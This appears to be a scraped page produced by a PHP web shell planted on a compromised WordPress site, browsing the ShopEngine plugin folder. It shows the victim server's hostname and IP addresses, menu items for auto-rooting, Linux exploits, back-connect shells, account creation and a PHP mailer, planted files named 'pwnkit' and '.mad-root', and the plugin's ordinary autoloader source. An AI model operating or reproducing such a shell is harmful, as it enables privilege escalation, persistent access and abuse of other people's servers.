Linux webm019.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.128.20.19 | : 216.73.216.176
Cant Read [ /etc/named.conf ]
8.0.30
nicedoo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
nicedoo /
www /
wp-content /
plugins /
shopengine /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
base
[ DIR ]
drwxr-xr-x
compatibility
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
traits
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
autoloader.php
944
B
-rw-r--r--
phpcs.xml
3.71
KB
-rw-r--r--
plugin.php
12.92
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
93.13
KB
-rw-r--r--
shopengine.php
6.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : autoloader.php
<?php namespace ShopEngine; defined('ABSPATH') || exit; /** * ShopEngine autoloader. * Handles dynamically loading classes only when needed. * * @since 1.0.0 */ class Autoloader { /** * Run autoloader. * Register a function as `__autoload()` implementation. * * @since 1.0.0 * @access public */ public static function run() { spl_autoload_register([__CLASS__, 'autoload']); } /** * * @param $class_name */ private static function autoload($class_name) { if(0 !== strpos($class_name, __NAMESPACE__)) { return; } $file_name = strtolower( preg_replace( ['/\b' . __NAMESPACE__ . '\\\/', '/([a-z])([A-Z])/', '/_/', '/\\\/'], ['', '$1-$2', '-', DIRECTORY_SEPARATOR], $class_name ) ); $file = plugin_dir_path(__FILE__) . $file_name . '.php'; if(file_exists($file)) { require_once($file); } } } /** * Calling the autoloader to class files * */ Autoloader::run();
Close